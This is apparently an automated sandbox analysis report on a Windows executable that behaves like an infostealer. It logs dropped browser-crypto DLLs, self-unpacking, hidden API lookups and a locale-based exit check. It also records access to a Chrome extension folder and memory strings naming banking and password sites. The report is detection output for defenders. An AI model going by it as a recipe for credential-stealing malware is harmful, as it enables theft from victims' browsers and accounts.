Source: C:\Users\user\Desktop\t13pv4ox18.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: Google Drive.lnk.2.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.2.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.2.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.2.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.2.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.2.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: C:\Users\user\Desktop\t13pv4ox18.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: t13pv4ox18.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: mozglue.pdbP source: t13pv4ox18.exe, 00000000.00000002.2465277640.000000006C7CD000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: t13pv4ox18.exe, 00000000.00000002.2465468623.000000006C98F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: t13pv4ox18.exe, 00000000.00000002.2465468623.000000006C98F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: t13pv4ox18.exe, 00000000.00000002.2465277640.000000006C7CD000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\t13pv4ox18.exe Unpacked PE file: 0.2.t13pv4ox18.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\t13pv4ox18.exe Unpacked PE file: 0.2.t13pv4ox18.exe.400000.0.unpack
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_00416240 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00416240
PE file contains sections with non-standard names
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_004176C5 push ecx; ret 0_2_004176D8
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C78B536 push ecx; ret 0_2_6C78B549
Drops PE files
Source: C:\Users\user\Desktop\t13pv4ox18.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\t13pv4ox18.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\t13pv4ox18.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\t13pv4ox18.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\t13pv4ox18.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\t13pv4ox18.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\t13pv4ox18.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\t13pv4ox18.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\t13pv4ox18.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\t13pv4ox18.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\t13pv4ox18.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\t13pv4ox18.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\t13pv4ox18.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\t13pv4ox18.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\t13pv4ox18.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\t13pv4ox18.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\t13pv4ox18.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\t13pv4ox18.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Stores files to the Windows start menu directory
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_00416240 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00416240
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after checking locale)
Source: C:\Users\user\Desktop\t13pv4ox18.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\t13pv4ox18.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\t13pv4ox18.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\t13pv4ox18.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\t13pv4ox18.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\t13pv4ox18.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\t13pv4ox18.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\t13pv4ox18.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\t13pv4ox18.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\t13pv4ox18.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\t13pv4ox18.exe API coverage: 6.2 %
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00412570
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040D1C0
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_004015C0 FindFirstFileA,StrCmpCA,StrCmpCA,LoadLibraryW,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_004015C0
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_00411650
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040B610
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_0040DB60
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00411B80
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040D540
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_004121F0
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_00401120 GetSystemInfo,ExitProcess, 0_2_00401120
Source: C:\Users\user\Desktop\t13pv4ox18.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: Amcache.hve.9.dr Binary or memory string: VMware
Source: HJDGCGDB.0.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: HJDGCGDB.0.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: HJDGCGDB.0.dr Binary or memory string: global block list test formVMware20,11696428655
Source: Amcache.hve.9.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: t13pv4ox18.exe, 00000000.00000002.2441189053.0000000001BE6000.00000004.00000020.00020000.00000000.sdmp, t13pv4ox18.exe, 00000000.00000002.2441189053.0000000001BB9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: HJDGCGDB.0.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Amcache.hve.9.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: HJDGCGDB.0.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Amcache.hve.9.dr Binary or memory string: vmci.sys
Source: HJDGCGDB.0.dr Binary or memory string: AMC password management pageVMware20,11696428655
Source: HJDGCGDB.0.dr Binary or memory string: tasks.office.comVMware20,11696428655o
Source: HJDGCGDB.0.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: HJDGCGDB.0.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: HJDGCGDB.0.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Amcache.hve.9.dr Binary or memory string: VMware20,1
Source: Amcache.hve.9.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.9.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.9.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: t13pv4ox18.exe, 00000000.00000002.2441113008.0000000001B6E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: HJDGCGDB.0.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Amcache.hve.9.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.9.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.9.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.9.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.9.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.9.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: HJDGCGDB.0.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: HJDGCGDB.0.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: Amcache.hve.9.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: HJDGCGDB.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Amcache.hve.9.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.9.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.9.dr Binary or memory string: VMware, Inc.
Source: HJDGCGDB.0.dr Binary or memory string: discord.comVMware20,11696428655f
